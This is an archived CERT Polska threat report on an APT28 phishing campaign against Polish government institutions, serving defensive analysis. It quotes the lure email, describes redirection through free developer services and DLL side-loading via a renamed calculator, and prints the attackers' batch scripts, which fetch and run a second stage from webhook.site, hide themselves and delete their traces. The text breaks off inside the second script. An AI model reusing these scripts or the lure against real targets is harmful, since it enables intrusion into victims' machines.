APT28 campaign targeting Polish government institutions Archived: 2026-04-05 18:31:23 UTC This week, the CERT Polska (CSIRT NASK) and CSIRT MON teams observed a large-scale malware campaign targeting Polish government institutions. Based on technical indicators and similarity to attacks described in the past (e.g. on Ukrainian entities), the campaign can be associated with the APT28 activity set, which is associated with Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Technical analysis The campaign sent e-mails with content intended to arouse the recipient's interest and persuade him to click on the link. An example of the message used is presented below: Email's content translated to English: Subject: I solved your problem Hello Paweł! I did a little research and found this mysterious Ukrainian woman. Now she is in Warsaw. She runs a rather unusual company that sells used underwear. also has clients from senior authorities in Poland and Ukraine. All information on this subject is available at this link - ALINA-BOKLAN The link directs to an address in the domain run.mocky.io . It is a free service used by developers to create and test APIs. In this case, it was used only to redirect to another website webhook.site allowing logging all queries to the generated address and configuring responses to them. This website is also popular among people related to IT. The use of free, commonly used services instead of your own domains allows you to significantly reduce the detection of links as malicious, and at the same time reduces the cost of the operation. This is a trend we see across many APT groups. https://cert.pl/en/posts/2024/05/apt28-campaign/ Page 1 of 7 Finally, a ZIP archive is downloaded from the website webhook.site , which name suggests the content in the form of photos. It starts with IMG- and ends with a random number (e.g. IMG-238279780.zip ). After clicking on the archive, with the default Windows settings (hidden extensions and no showing of hidden files), the victim is presented with the following view: The archive actually contains three files: a Windows calculator with a changed name, e.g. IMG-238279780.jpg.exe , which pretends to be a photo and encourages the victim to click, script .bat (hidden file), fake library WindowsCodecs.dll (hidden file). If the victim runs the file IMG-238279780.jpg.exe which is a harmless calculator, during startup it will try to load a library WindowsCodecs.dll that was substituted by the attackers. This is a technique known as DLL Side-Loading. The only role of the DLL is to run the included BAT script: @echo off if not DEFINED IS_MINIMIZED ( set IS_MINIMIZED=1 start "" /min "%~dpnx0" %* exit ) start msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlY timeout 15 > nul move %userprofile%\downloads\IMG-63492336968.jpg %programdata%\IMG-63492336968.cmd > nul type nul > %userprofile%\downloads\IMG-63492336968.jpg call %programdata%\IMG-63492336968.cmd https://cert.pl/en/posts/2024/05/apt28-campaign/ Page 2 of 7 del /q /f /a %0 exit The BAT script opens the Microsoft Edge browser, which loads the base64-encoded page content to download another batch script (also using the website webhook.site ). At the same time, the browser displays photos of an actual woman in a swimsuit along with links to her real accounts on social media platforms. This is intended to make the attackers' narrative credible and to lull the recipient's vigilance. The script saves the downloaded file with the .jpg extension on disk, changes the extension from .jpg to .cmd and finally executes it. @echo off & ( echo On Error Resume Next echo CreateObject("WScript.shell").Run "^""%%programdata%%\\dee016bf-21a2-45dd-86b4-6099747794c4.bat^"^^"", echo Set oFso = CreateObject("Scripting.FileSystemObject") : oFso.DeleteFile Wscript.ScriptFullName, True ) > "%programdata%\dee016bf-21a2-45dd-86b4-6099747794c4.vbs" & echo del %%0 ^& for /l %%%%n in () do ( chcp 65001 ^& timeout 300 ^& taskkill /im msedge.exe /f ^& timeout 5 ^& del /q /f "%%userprofile%%\Downloads ) > "%programdata%\dee016bf-21a2-45dd-86b4-6099747794c4.bat" & ( echo ^^^
^